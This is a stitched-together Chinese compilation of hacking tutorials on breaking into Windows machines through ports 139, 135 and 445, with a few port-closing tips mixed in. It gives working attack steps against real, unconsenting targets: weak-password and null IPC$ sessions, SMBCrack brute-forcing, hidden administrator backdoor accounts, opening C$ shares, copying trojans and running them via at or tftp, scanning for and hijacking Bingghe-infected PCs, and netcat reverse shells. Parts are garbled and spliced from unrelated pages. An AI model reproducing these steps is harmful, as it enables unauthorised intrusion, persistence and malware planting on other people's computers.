139端口入侵简易教程
139端口入侵
Share name Type Used as Comment
IPC成功建立后,服务器的共享资源列表才能访问到
我们在看一下有没有可以用net命令进行连接的。
c:\>net use x: \\[ipaddr]\[share]
键入regedit。
选择Registry -> Connect Network Registry,
再键入那台机器的IP地址。不一会,就能看目标计算机的的Registry了。
呵呵,搞定了
这个命令很有用呀
C:\>net use \\0.0.0.0\ipc$ 密码/user:用户名
-S 列出和目标IP地址会话的表
-s 列出会话表转换
OK,我们在来看看共享
C:\>net view \\[目标计算机的IP地址]
不过有可能会被拒绝
在试试C:\>net use \\IP\ipc$ "" /user:""
The completed successfully.
万一不行的话我们就用上面的方法IPC$
一旦IPC$共享顺利完成,我们就可以映射了,(晕,不知什么是映射,下次在说吧):
c:\>net use g: \\IP\c$
得到了C$共享,并将该目录映射到g:,键入:
c:\>dir g: /p
就能显示这个目录的所有内容。
成功地进行了IPC$连接后,点击Start -> Run,
开关:
-a 列出给定主机名的远程计算机的名字表(name table)
校园网入侵操作步骤
校园网入侵操作步骤校园网入侵操作步骤一、条件准备下载三个黑客软件:NTscan变态扫描器、Recton v2.5、DameWare迷你中文版4.5。
NTscan变态扫描器可以对指定IP地址段的所有主机进行扫描,扫描方式有IPC扫描、SMB扫描、WMI扫描三种,可以扫描打开某个指定端口的主机,通过扫描可以得到其中弱口令主机的管理员用户名和密码。
Recton v2.5是一个典型的黑客攻击软件,只要拥有某一个远程主机的管理员账号和密码,并且远程主机的135端口和WMI 服务(默认启动)都开启,就可以利用该软件完成远程开关telnet,远程运行CMD命令,远程重启和查杀进程,远程查看、启动和停止服务、查看和创建共享、种植木马、远程清除所有日志等操作。
DameWare迷你中文版4.5是一款远程控制软件,只要拥有一个远程主机的账号和密码,就可以对该主机实施远程监控,监视远程主机的所有操作甚至达到控制远程主机的目的。
另外选择两台操作系统为Windows XP Professional的主机,其中一台作为实施攻击的主机(以下称“主机A”),另一台作为被攻击的主机(以下称“主机B”),并将两台主机接入局域网中。
二、模拟攻击前的准备由于本次模拟攻击所用到的黑客软件均可被较新的杀毒软件和防火墙检测出并自动进行隔离或删除的处理,因此,在模拟攻击前要先将两台主机安装的杀毒软件和防火墙全部关闭。
然后打开“控制面板”中的“windows安全中心”,执行“windows防火墙”设置,将“windows防火墙”也关闭,如图所示。
由于在默认的情况下,两台主机的IPC$共享、默认共享、135端口和WMI服务均处于开启状态,因此对共享、端口和服务不做任何调整。
设置主机A的IP地址为“172.16.100.1”,主机B的IP地址为“172.16.100.2”(IP地址可以根据实际情况自行设定),两台主机的子网掩码均应为“255.255.0.0”。
十三步简单入侵个人电脑教程
⼗三步简单⼊侵个⼈电脑教程 ⽊马冰河是⼀款功能强⼤的远程控制软件,因为它的功能很强⼤所以成为了⿊客们发动⼊侵的⼯具,2HK联盟Mask曾利⽤它⼊侵过数千台电脑,国外电脑也不例外,⼀起来看看哪⼗三步简单⼊侵个⼈电脑吧。
第⼀步 下载必备的⼯具软件。
1号软件就是端⼝扫描⼯具“⽹络刺客II”,2号软件就是著名的国产⽊马冰河2.2的控制端. 下载完毕并解压缩之后跟我进⾏第⼆步! 第⼆步 运⾏1号软件,⾸先出现的是“⽹络刺客II注册向导”,别理它,点击“稍后(Q)”就进⼊了⽹络刺客II的主界⾯。
第三步 在⽹络刺客II的主界⾯⾥选“⼯具箱(U)”-》“主机查找器(H)”,就进⼊了“搜索因特⽹主机”界⾯。
第四步 进⼊“搜索因特⽹主机”界⾯后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX⾃⼰去选择了,⽐如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前⾯⼀样。
“端⼝”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这⼀段IP地址中有冰河⽊马的计算机了,再检查⼀下填对没有?如果⼀切OK,请点击“开始搜索”。
第五步 观察“总进度”和“段进度”是否在⾛动。
如果没有⾛动,那⼀定是IP地址设置不对,请认真检查。
如果两个进度都在⾛动,呵呵,你就成功⼀半了,⾄少你会使⽤⽹络刺客II扫描⽹上开放某⼀端⼝的计算机了。
下⾯你要作的就是静静的等待,学⽤⿊客软件是需要耐⼼的。
⼤约20-30分钟后,最下⾯的记录栏⾥就应该出现记录了(⼀般情况下,应该有5、6条记录)。
每⼀条记录找到的中了冰河⽊马的⼀台计算机,前⾯是该计算机的IP地址,后⾯是7626(冰河⽊马端⼝)。
第六步点击“停⽌搜索”,但不要退出程序,到第⼗⼆步时还要⽤。
运⾏2号软件冰河,进⼊冰河主界⾯。
选“⽂件[F]”-》“添加主机[A]”进⼊添加主机窗⼝。
Windows作业系统的port139入侵
22
建立最高權限帳戶
* 原理與說明---Windows系統本身會提供一個小工具
net.exe,執行它即可建立最高權限帳戶
Net指令
這裡不變 密碼,自己取 用戶名稱自取
net user hacker 1234 /add
這裡不變
net localgroup administrators hacker /add
14
按確定
15
HKEY_LOCAL_MACHINE\SYSTEM\CurrentCo ntrolSet\Services\lanmanserver\shar es
16
5.WinNT、Win2K的預設共用漏洞
Windows 2000/XP/2003版本的作業系統提供了預設共 用功能,這些預設的共用都有“$”標誌,意為隱含的, 包括所有的邏輯硬碟(C$,D$,E$……)和系統目錄 Winnt或Windows(admin$)。 帶來的問題: 微軟的初衷是便於網管進行遠端管理,這雖然方便了 局域網用戶,但對我們個人用戶來說這樣的設定是不 安全的。如果電腦連上網路,網路上的任何人都可以 通過共用硬碟,隨意進入你的電腦。所以我們有必要 關閉這些共用。更為可怕的是,駭客可以通過連接你 的電腦實現對這些預設共用的入侵。
是否磁碟需要給其他 連線電腦使用? Y
N 關閉所有共享資源
N 使用Win9X or WinMe? Y 修補密碼漏洞
設定個別使用者權限與密碼 (Win2K/Win XP適用)
N 是否提供唯讀(Read Only) Y 設定只可唯讀
設定不易猜到的密碼與用戶 名稱
6
關閉Port 139
(2)此項目打勾取消 (3)按下此按鈕
屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧
屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。
为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和UDP 135、137、138、445 端口,一些流行病毒的后门端口(如TCP 2745、3127、6129 端口),以及远程服务访问端口3389。
下面介绍如何在WinXP/2000/2003下关闭这些网络端口:第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建IP 安全策略”(如右图),于是弹出一个向导。
在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。
第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。
第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何IP 地址”,目标地址选“我的IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮(如左图),这样就添加了一个屏蔽TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。
点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加TCP 137、139、445、593 端口和UDP 135、139、445 端口,为它们建立相应的筛选器。
局域网入侵方法介绍
局域网入侵方法介绍局域网入侵教程对于有些人来说非常重要,很是想要了解一些入侵方法,但是要掌握这些其实还是存在着一些难题。
下面由小编给你做出详细的局域网入侵方法介绍!希望对你有帮助!局域网入侵方法介绍:局域网入侵方法一:不过比如说在学校的时候,可以进入到整个学校网。
一般如果可以入侵的时候,一般就是有弱口令存在,主要就是其中还包含了139端口,不过其中的防火墙这方面的机子没有开。
所以这个时候需要有入侵工具,对于局域网入侵教程来说,所谓的工具主要就是包含以下这些:首先学习好局域网入侵教程,就是包含了变态扫描器、还有迷你中文版等各种工具,而且在工具之中还包含了杀毒软件,具有了报毒的作用。
在入侵的过程中,需要有变态扫描器,就是在IP地址之中,把需要进行扫描的地址给填上。
然后就是扫描的时候是选择WMI的方式,这样就是按开始键等就可以了,有关局域网ip如何设置的问题。
然后就是面贺杀专用版的名字就是Recton--D,也就是可以将CMD命令选择,然后把"net share C$=C:\"输入其中,这样就是把其余主机之中共享C盘那里进行开启。
这样的局域网入侵教程能够带给人们一些效益。
最后可以将这个变成D、E或者是F等,这样可以把其他盘之中的共享也可以进行开启,在这个过程中其实具有着很高的隐蔽性,而且共享是包含了完全的特点,有关win7防火墙设置问题。
就是这样,便能够达到对方电脑的C盘之中,然后根据自己掌握的技术把CMD 选项成功执行命令。
也就是通过这个方法可以达到局域网入侵的目的,所以必需要掌握局域网入侵教程。
局域网入侵方法二:点我的电脑右键单机管理,然后点操作底下的=》连接到另外一个计算机。
输入对方ip或者你不知道对方ip 可以这样,点浏览高级里的立即查找,就可以显示本局域网工作组内的计算机了。
然后双击你要进入的电脑,呵呵一般局域网的计算机密码是一样的,所以不需要NTLM验证,不过那个验证比较老了,现在不知道还有没有人会用,进入后然后点服务和应用,找到telnet服务,然后开启对方telnet服务,如果没有进入这些界面或者服务出错是因为对方没有开rpc服务,当然还是选择放弃吧,如果按照刚才步骤成功,那恭喜你已经得到一个进入对方计算机的通道了。
ipc$入侵
用TELNET弱口令我给你例子看好了c:\>telnet 192.168.0.1user:administratorpossword:[如果是弱口令密码可能是空的或是简单的]下面就进入他的shall了c:\>net user hacker[用户] hacker[密码自己定义] /addc:\>net localgroup administrator hacker [用户] /add这是个自己在他的计算机中建立自己的用户并提升为管理员权限还有你可以用IPC$命令攻击ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)1)ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).2)ipc$与139,445端口:ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.3)ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)五ipc$连接失败的原因以下5个原因是比较常见的:1)你的系统不是NT或以上操作系统;2)对方没有打开ipc$默认共享3)对方未开启139或445端口(惑被防火墙屏蔽)4)你的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因:错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;错误号51,Windows 无法找到网络路径: 网络有问题;错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。
139端口入侵
139端口入侵(更加详细)附图下面先给大家介绍一下什么是NETBIOS:Netbios(NETwork Basic Input/Output System)网络基本输入输出系统。
是1983年IBM开发的一套网络标准,微软在这基础上继续开发。
微软的客户机/服务器网络系统都是基于NetBIOS的。
在利用Windows NT4.0 构建的网络系统中,对每一台主机的唯一标识信息是它的NetBIOS名。
系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。
在这样的网络系统内部,利用NetBIOS名实现信息通讯是非常方便、快捷的。
但是在In ternet上,它就和一个后门程序差不多了。
不少骇客就是通过这个漏洞入侵计算机的!下面是经常用的139端口的攻与防第一步我们需要做的是确定一台存在139端口漏洞的主机。
可以用扫描工具扫描得到!我就不说了第二步假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!如下图:上图中的202.98.84.90就是我的IP地址,这个主机的名字是21,工作组是YB第三步我们要做的是与对方计算机进行共享资源的连接在这里我们需要用到两个NET命令,下面就是这两个命令的使用方法NET VIEW?作用:显示域列表、计算机列表或指定计算机的共享资源列表。
?命令格式:net view [\\computername | /domain[:domainname]]?参数介绍:?<1>键入不带参数的net view显示当前域的计算机列表。
?<2>\\computername 指定要查看其共享资源的计算机。
?<3>/domain[:domainname]指定要查看其可用计算机的域?NET USE?作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。
139端口入侵简易教程
net use \\192.168.0.1\ipc$Content$nbsp;"" /user:administrator提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。
首先,连接的命令是:net<空格>use<空格>\\IP地址\ipc$Content$lt;空格>密码<空格>/user:用户名假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的:net use \\192.168.1.11\ipc$Content$nbsp;123456 /user:google 如果连接成功,那么系统会提示"命令成功完成"!空密码是这样的:如果密码是空的,那就在原先输入密码的地方以""代替。
开始查看权限:查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。
命令的格式是这样的:copy<>文件绝对路径<>\\IP地址\文件目标路径比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下:copy c:\a.exe \\192.168.1.11\d$Content$nbsp;要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。
如果命令执行成功,系统同样会提示"已复制 1 个文件"小技巧:再次复制相同文件至相同路径,以检测是否存在杀毒软件!!!如果系统提示“改写 \\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。
各个端口的入侵方法(入侵菜鸟必看)
各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。
(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。
(小榕的注入软件)。
5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。
(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。
(servlocal.exe)======================================对serv-u的MD5加密密码,可以用字典暴破。
(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。
如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。
7. 6129端口用DameWare6129.exe入侵。
8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。
入侵139端口教程
(1)肉鸡猎手只能搜密码为空的主机,所以只能一开始让我们练练手。一般要对139端口攻击,我们使用SMBCrack这个软件,它是针对一台主机进行密码的暴力猜解的,速度非常快,在我机器上猜了24万个密码只用了半小时左右,命令行窗口下输入smbcrack 192.168.1.101 administrator words.txt 139 就开始猜解密码了。192.168.1.101这里改为你要攻击的IP,words.txt是字典,里面含有很多口令,你可以自己上网找找,好的字典能提高入侵的成功率。
哈哈,现在我们就建立好了IPC$(远程管理连接)
查看共享 net view \\192.168.1.101
再来,取得远程主机时间:net time \\192.168.1.101 显示: \\192.168.1.10ห้องสมุดไป่ตู้ 的当前时间是 2003/5/22 上午 10:32。
然后用at命令启动远程主机的telent服务,at \\192.168.1.101 10:32 telent,方便我们登陆远程主机。
(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念,建立IPC$是为了能够使用at 命令来启动telent服务,几乎所有的命令都是在登陆远程主机之后使用,否则都是对你自己的计算机操作。)
然后,telent 192.168.1.101 23,出现如图提示窗口(图二),敲入administrator 回车两次,出现了命令提示符,现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户,这里我们只发现了administrator,guest,Iuser_KiKi三个用户,考虑到下次进入该主机时用户可能已经更改了administrator 的密码,为了能够顺利地再次进入,我们需要留下一个小后门。通常我们会这样做,输入net user guest/active:yes 激活guest 用户(guest用户系统内置的,因此每台计算机上都有,默认禁用此用户)。net user guest 12345 更改guest的密码为12345,net localgroup administrators guest /add 把guest的权限提升为管理员权限,这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后,你可以好好地在他的机子上逛一圈,看看有没有什么有趣的东西,顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便,那么跟我来,我将带你进入丰富多采的图形界面。现在,在命临行窗口下输入exit,显示“断开远程主机的连接”,我们用exit这个命令离开了远程主机,回到自己的机器上,点击载下来的DameWare,出现如图所示界面(图三),在"host name"里填上对方IP,输入用户名administrator和密码(现在密码为空,所以不填),点击"Connect",然后等待DameWare拷贝文件,启动服务等一系列动作完成。一会而之后,出现如图(图四)窗口,里面现示的就是远程主机的桌面,别人的一举一动你都可以看见,你还可以接管他的鼠标,是不是挺有意思的呢?但是记住,我们是来学习技术的,并不是来破坏的,所以千万别做什么坏事哦。
能入侵的只是存在弱口令(用户名为administrator等,密码为空)
将实时防毒关掉。
3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最后蔢X乇展蚕恚?乇诔盘共享:"net share C$ /del"。
2.使用"Recton--D贺免杀专用版"
选择"CMD命令"项,在"CMD:"中输入"net share C$=C:\",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\\对方IP\C$",即可进入对方C盘。
一般要用到三个:NTscan**扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)
入侵步骤:
很简单的入侵局域网电脑
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?
四 空会话可以做什么
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。
选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use [url=file://\\***.***.***.***\IPC$]\\***.***.***.***\IPC$[/url] "" /user:administrator"在*处填入你入侵的主机IP。
命令:net view [url=file://\\ip]\\ip[/url]
解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。
在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释
-----------------------------------------------------------
从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令:
利用135端口和445端口入侵
445端口入侵
用到的工具:
一.扫描器 二.NTscan汉化版 三.灰鸽子木马 四.端口受到网络的限制,我们只能扫本市的,不过大家可以到肉鸡上扫,呵呵,那可是肉鸡生肉鸡啊
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS。
相关命令:
net share 查看它有没有开共享
net stop sharedaccess 关防火墙
net share d$=d: D盘共享开启
copy server.exe \\59.52.61.5\d$ 传木马到肉鸡的D盘里
net share d$ /del 把D盘共享删掉
3.打开Recton,选择第二个(也就是Telnet的那个,然后在"远程主机"那里扫你刚刚扫出空口令的IP,直接点个【开始执行】就可以了(成功的话基本上是显示→
连接成功!
正在检查Telnet服务状态 ......
正在改变服务状态 ......
正在设置 NTLM=0 ......
如果有这样的话就选N..回车...
login:
password:
login:后填administrator,下面个是密码,不用填,直接回车就行...)
然后就进了他的C盘了(一般的话)..如果没在C盘的话键入 CD,这个命令就回到C盘的,然后你再键入这段命令:tftp -i ***.***.***.*** get 1.exe
哪些端口容易被攻击
哪些端口是常被黑客、病毒入侵的?最容易被入侵端口有:135、139、445、3389445端口端口说明:用来传输文件和NET远程管理端口漏洞:黑客喜欢扫描扫描的漏洞,也是震荡病毒扫描的.关闭445端口的方法有很多,但是我比较推荐以下这种方法:修改注册表,添加一个键值Hive: HKEY_LOCAL_MACHINEKey: System\CurrentControlSet\Services\NetBT\ParametersName: SMBDeviceEnabledType: REG_DWORDvalue:554端口端口说明:554端口默认情况下用于“Real Time Streaming Protocol”(实时流协议,简称RTSP),该协议是由RealNetworks和Netscape共同提出的,通过RTSP协议可以借助于Internet将流媒体文件传送到RealPlayer中播放,并能有效地、最大限度地利用有限的网络带宽,传输的流媒体文件一般是Real 服务器发布的,包括有.rm、.ram。
如今,很多的下载软件都支持RTSP协议,比如FlashGet、影音传送带等等。
端口漏洞:目前,RTSP协议所发现的漏洞主要就是RealNetworks早期发布的Helix Universal Server存在缓冲区溢出漏洞,相对来说,使用的554端口是安全的。
操作建议:为了能欣赏并下载到RTSP协议的流媒体文件,建议开启554端口。
1024端口端口说明:1024端口一般不固定分配给某个服务,在英文中的解释是“Reserved”(保留)。
之前,我们曾经提到过动态端口的范围是从1024~65535,而1024正是动态端口的开始。
该端口一般分配给第一个向系统发出申请的服务,在关闭服务的时候,就会释放1024端口,等待其他服务的调用。
端口漏洞:著名的YAI木马病毒默认使用的就是1024端口,通过该木马可以远程控制目标计算机,获取计算机的屏幕图像、记录键盘事件、获取密码等,后果是比较严重的。
入侵网吧服务器
osoft-DS)端口,在IE地址栏内输入"ftp://192.168.0.100",有个共享目录Backup,打开浏览了一遍,东西挺多,只是有个万象2003的安装程
执行“shutdown -r”后,提示“权限不够,客户机不能执行重启命令”,算了吧!心急的可以来个拒绝服务攻击。本篇写的确实挺乱的,没有
什么技术性可言,仅供一些人参考,写得不好之处欢迎来信赐教!!
举目标服务器的密码,但是很费时,我没有太多时间,便放弃了。又试着对服务器的fp30reg.dll进行溢出。由于对方防火墙的阻挡,测试失
败。Win98的客户机实在不能利用目标服务器的139端口做些什么。用“RPC Exploit GUI”溢出服务器的139、445端口的成功率太低。先冷静
一会儿,满着看目标服务器的网站做的如何,随便点了一会儿,是个利用RealPlayer播放的在线电影网站,想起来了,该服务不是开了个554
入侵网吧服务器
一、确定目标
? 首先要确定要攻击的目标,即网吧服务器的IP是多少。我所在网吧的客户机装的是Windows 98+万象2003,估计服务器应该是Windows 2k以上
,用Superscan 3.0扫了一下192.168.0.1~192.168.0.254这个范围的135端口,只有一个结果,往服务台瞅了一眼,确实只有一台服务器没有错
己添加会员,没什么好说的,可别告诉我你不会。再着是要把修改后的数据库文件传回来,由于服务器的万象服务端是开着的,为避免发生冲
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
139端口入侵简易教程;
net use \\192.168.0.1\ipc$ "" /user:administrator
提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。
首先,连接的命令是:
net<空格>use<空格>\\IP地址\ipc$<空格>密码<空格>/user:用户名
假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的:
net use \\192.168.1.11\ipc$ 123456 /user:google 如果连接成功,那么系统会提示"命令成功完成"!
空密码是这样的:
如果密码是空的,那就在原先输入密码的地方以""代替。
开始查看权限:
查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。
命令的格式是这样的:
copy<>文件绝对路径<>\\IP地址\文件目标路径
比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下:
copy c:\a.exe \\192.168.1.11\d$
要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。
如果命令执行成功,系统同样会提示"已复制1 个文件"
小技巧:
再次复制相同文件至相同路径,以检测是否存在杀毒软件!!!
如果系统提示“改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。
如果没有提示,则说明安装了杀毒软件。
查看目标系统时间,准备使用at任务计划运行程序。
命令格式:
net<空格>time<空格>\\IP地址
例子:
net time \\192.168.1.11
系统会返回目标的当前时间,时间显示后,AT任务计划命令需要使用24小时制。
比如系统显示“\\192.168.1.11 的当前时间是2006/5/10 下午06:02”在使用到AT任务计划命令时,这个“下午06:02”就需要换算成“18:02”!
使用AT命令为目标系统添加任务计划:
格式:
at<空格>\\IP地址<空格>指定运行时间<空格>需要运行的文件路径名
例子:
at \\192.168.1.11 18:20 d:\a.exe
IPC通道入侵就目前来看已经是一个非常老的攻击手段了,现在针对IPC通道的防御手段也越来越多,越来越简单。
但如果一个攻击者成功获得了IPC通道的一个System权限,那对于被攻击的系统来说无意是致命的。
所以,建议用户将Server服务关闭,信使服务与Task Scheduler服务(计划任务)也都关闭,这样可以较全面的保护计算机在IPC通道方面的安全。